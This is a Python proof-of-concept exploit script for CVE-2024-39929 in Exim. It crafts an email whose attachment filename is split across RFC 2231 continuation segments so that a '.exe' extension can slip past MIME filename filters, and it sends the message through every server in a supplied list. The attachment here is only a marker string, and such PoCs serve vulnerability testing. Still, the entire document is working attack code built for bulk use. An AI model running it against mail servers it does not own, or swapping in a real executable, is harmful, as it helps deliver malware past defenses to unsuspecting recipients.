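# Exploit Title: Exim - CVE-2024-39929 - POC
# Date: 07/29/2024
# Exploit Author: Michael Fry
# Vendor Homepage: https://www.exim.org/
# Software Link: https://github.com/michael-david-fry/CVE-2024-39929
# Version: <= 4.97.1
# Tested on: Kali Linux
# CVE: CVE-2024-39929
#
# What the test message exercises: the attachment's filename is split across
# RFC 2231 parameter continuations (filename*0, filename*1, filename*2), with
# the extension carried only by the last segment. CVE-2024-39929 covers Exim
# versions in the range above misparsing such a multiline filename, so an ACL
# that blocks attachments by matching $mime_filename may not see the
# extension. The attachment body is the plain-text marker string below.
#
# Reading the result: a completed SMTP transaction only means the server
# accepted the message. Whether the extension filter matched has to be read
# on the receiving side (was the attachment delivered, or did the MIME ACL
# reject it) and in the server's mail log.

import argparse
import smtplib
from email import encoders
from email.mime.base import MIMEBase
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

# Port used for every server in the list.
SMTP_PORT = 25

# Upper bound, in seconds, on connect and on each blocking socket operation,
# so that one unresponsive host cannot stall the rest of the run.
SMTP_TIMEOUT_SECONDS = 30


def send_exploit_email(smtp_server, smtp_port, sender_email, recipient_email):
    """Send the CVE-2024-39929 test message through one SMTP server.

    Args:
        smtp_server: Host name or address of the server to connect to.
        smtp_port: TCP port of the SMTP service.
        sender_email: Envelope sender and ``From`` header value.
        recipient_email: Envelope recipient and ``To`` header value.

    Returns:
        None. The outcome is printed; connection and SMTP errors are reported
        and swallowed so the caller can continue with the next server. Any
        other exception propagates, since it points at the inputs rather than
        at the server.
    """
    # Marker text used both as the body and as the attachment content.
    payload = 'This is a CVE-2024-39929 test.'

    # Multipart container: a plain-text body plus one attachment.
    msg = MIMEMultipart()
    msg['Subject'] = f'Exploit CVE-2024-39929 Test through {smtp_server}'
    msg['From'] = sender_email
    msg['To'] = recipient_email
    msg.attach(MIMEText(payload, 'plain'))

    attachment = MIMEBase('application', 'octet-stream')
    attachment.set_payload(payload)
    encoders.encode_base64(attachment)

    # Filename split into RFC 2231 continuation segments; the extension is in
    # the final segment. This is the header the affected parser mishandles.
    attachment.add_header(
        'Content-Disposition',
        'attachment; filename*0="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"; '
        'filename*1="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"; '
        'filename*2=".exe"',
    )
    msg.attach(attachment)

    try:
        with smtplib.SMTP(smtp_server, smtp_port, timeout=SMTP_TIMEOUT_SECONDS) as server:
            # Prints the full SMTP dialogue to stderr; the server's replies
            # are the only feedback this script gets from the remote side.
            server.set_debuglevel(1)

            server.ehlo()

            # NOTE(review): starttls() is called without an SSL context, so
            # the server certificate is not verified; this is opportunistic
            # encryption only. Pass a context from
            # ssl.create_default_context() if the peer must be authenticated.
            if server.has_extn('STARTTLS'):
                server.starttls()
                # Capabilities must be re-read after the TLS upgrade.
                server.ehlo()

            server.sendmail(sender_email, [recipient_email], msg.as_string())

        # Accepted for delivery; this alone does not show that the
        # attachment filter was bypassed.
        print(f"Exploit email sent to {smtp_server}")
    except (smtplib.SMTPException, OSError) as e:
        # OSError covers DNS failures, refused connections, timeouts and TLS
        # errors; SMTPException covers protocol-level rejections.
        print(f"Error sending email to {smtp_server}: {e}")


def read_servers_from_file(file_path):
    """Return the non-blank lines of *file_path*, stripped of whitespace.

    Args:
        file_path: Path to a text file with one SMTP server per line.

    Returns:
        A list of server names in file order; blank and whitespace-only
        lines are skipped.
    """
    # Explicit encoding so the result does not depend on the platform locale.
    with open(file_path, 'r', encoding='utf-8') as file:
        stripped_lines = (line.strip() for line in file)
        return [host for host in stripped_lines if host]


def main():
    """Prompt for the addresses and send the test message to each listed server."""
    parser = argparse.ArgumentParser(description="Send exploit email to a list of SMTP servers.")
    parser.add_argument('file_path', help='Path to the file containing the list of SMTP servers')
    args = parser.parse_args()

    sender_email = input("Enter the sender email address: ")
    recipient_email = input("Enter the recipient email address: ")

    smtp_servers = read_servers_from_file(args.file_path)

    for smtp_server in smtp_servers:
        print(f"\nConnecting to {smtp_server}...")
        send_exploit_email(smtp_server, SMTP_PORT, sender_email, recipient_email)


if __name__ == "__main__":
    main()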